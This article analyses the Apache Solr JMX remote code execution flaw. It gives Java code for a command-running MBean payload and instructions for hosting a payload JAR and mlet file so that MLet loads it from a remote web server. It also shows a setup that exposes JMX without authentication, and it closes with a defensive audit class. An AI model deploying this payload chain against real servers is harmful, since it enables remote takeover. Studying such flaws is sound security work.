Analysis of the Apache Solr JMX Remote Code Execution Vulnerability
Source: 岁月联盟
Date: 2020-01-29

    // PayloadMBean.java
    import java.io.IOException;

    // Management interface: JMX exposes every method declared here as an operation.
    public interface PayloadMBean {
        public String runCmd(String cmd) throws IOException, InterruptedException;
    }

    // Payload.java
    import java.io.BufferedReader;
    import java.io.IOException;
    import java.io.InputStreamReader;

    public class Payload implements PayloadMBean {
        @Override
        public String runCmd(String cmd) throws IOException, InterruptedException {
            Runtime runtime = Runtime.getRuntime();
            Process process = runtime.exec(cmd);
            BufferedReader stdInput = new BufferedReader(new InputStreamReader(process.getInputStream()));
            BufferedReader stdError = new BufferedReader(new InputStreamReader(process.getErrorStream()));
            String stdout_data = "";
            String strtmp;
            // Collect standard output, then standard error, one line at a time.
            while ((strtmp = stdInput.readLine()) != null) {
                stdout_data += strtmp + "\n";
            }
            while ((strtmp = stdError.readLine()) != null) {
                stdout_data += strtmp + "\n";
            }
            process.waitFor();
            return stdout_data;
        }
    }

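Next, create a file named mlet with the following content:
This file is consumed by the getMBeansFromURL function: through it, getMBeansFromURL downloads JMXPayload.jar from the remote host.
Place JMXPayload.jar and mlet in the same directory on the web server.
Add the MLet MBean to the MBeanServer with the following code: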

    import java.lang.management.ManagementFactory;
    import java.rmi.registry.LocateRegistry;
    import java.rmi.registry.Registry;
    import javax.management.MBeanServer;
    import javax.management.ObjectName;
    import javax.management.loading.MLet;
    import javax.management.remote.JMXConnectorServer;
    import javax.management.remote.JMXConnectorServerFactory;
    import javax.management.remote.JMXServiceURL;

    public class RemoteMbean {
        public static void main(String[] args) {
            try {
                MBeanServer mBeanServer = ManagementFactory.getPlatformMBeanServer();
                //---------------------------------------------
                // local mbean
                System.out.println("Register Hello bean...");
                HelloWorld hello = new HelloWorld();
                ObjectName objectHelloName = new ObjectName("JMXHello:name=hello");
                mBeanServer.registerMBean(hello, objectHelloName);
                // remote mbean
                System.out.println("Register MLet bean...");
                MLet mLet = new MLet();
                ObjectName objectNameMLet = new ObjectName("JMXMLet:type=MLet");
                mBeanServer.registerMBean(mLet, objectNameMLet);
                //mLet.getMBeansFromURL("http://192.168.1.110:8080/mlet");
                //-----------------------------------------------------------------
                //mBeanServer.invoke(evilObject.getObjectName(), "getMBeansFromURL", new Object[] {"http://192.168.1.110:8080/mlet"}, new String[] {String.class.getName()});
                // This line is essential and must not be omitted: it creates the RMI registry on a port.
                // Once the URL is bound, clients can connect to the JMXConnectorServer over RMI using that URL.
                Registry registry = LocateRegistry.createRegistry(1099);
                // Build the JMXServiceURL
                JMXServiceURL jmxServiceURL = new JMXServiceURL("service:jmx:rmi:///jndi/rmi://localhost:1099/jmxrmi");
                // Create the JMXConnectorServer (the null environment map means no authentication is configured)
                JMXConnectorServer jmxConnectorServer = JMXConnectorServerFactory.newJMXConnectorServer(jmxServiceURL, null, mBeanServer);
                // Start it
                jmxConnectorServer.start();
            } catch (Exception e) {
                e.printStackTrace();
            }
        }
    }
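
The getMBeansFromURL step above depends on an MLet MBean being registered in the MBeanServer, so an audit can look for exactly that. The following is an added example, not code from the original article: it lists every MBean that is an instance of javax.management.loading.MLet together with the URLs it loads classes from. The class name MLetAudit, the output format and the optional service-URL argument (for a server you operate) are assumptions.

```java
import java.lang.management.ManagementFactory;
import java.net.URL;
import java.util.ArrayList;
import java.util.List;
import javax.management.InstanceNotFoundException;
import javax.management.MBeanServerConnection;
import javax.management.ObjectName;
import javax.management.remote.JMXConnector;
import javax.management.remote.JMXConnectorFactory;
import javax.management.remote.JMXServiceURL;

// Added example (hypothetical class name): audit an MBeanServer for MLet MBeans.
public class MLetAudit {
    private static final String MLET_CLASS = "javax.management.loading.MLet";

    /** Returns one finding per registered MBean that is an MLet. */
    public static List<String> findMLets(MBeanServerConnection server) throws Exception {
        List<String> findings = new ArrayList<>();
        for (ObjectName name : server.queryNames(null, null)) {
            try {
                if (!server.isInstanceOf(name, MLET_CLASS)) {
                    continue;
                }
                StringBuilder line = new StringBuilder("MLet MBean registered: " + name);
                // MLetMBean declares getURLs(), exposed as the JMX attribute "URLs":
                // every location this class loader pulls code from.
                Object urls = server.getAttribute(name, "URLs");
                if (urls instanceof URL[]) {
                    for (URL u : (URL[]) urls) {
                        line.append(System.lineSeparator()).append("  loads from: ").append(u);
                    }
                }
                findings.add(line.toString());
            } catch (InstanceNotFoundException gone) {
                // MBean was unregistered between queryNames() and the check; skip it.
            }
        }
        return findings;
    }

    public static void main(String[] args) throws Exception {
        if (args.length == 0) { // no argument: audit this JVM's own platform MBeanServer
            findMLets(ManagementFactory.getPlatformMBeanServer()).forEach(System.out::println);
            return;
        }
        // args[0]: JMXServiceURL of a server you operate (assumption).
        try (JMXConnector c = JMXConnectorFactory.connect(new JMXServiceURL(args[0]))) {
            findMLets(c.getMBeanServerConnection()).forEach(System.out::println);
        }
    }
}
```

If the connection in the second branch succeeds without credentials, the connector itself accepts unauthenticated clients, which is the condition the listing above creates by passing a null environment map.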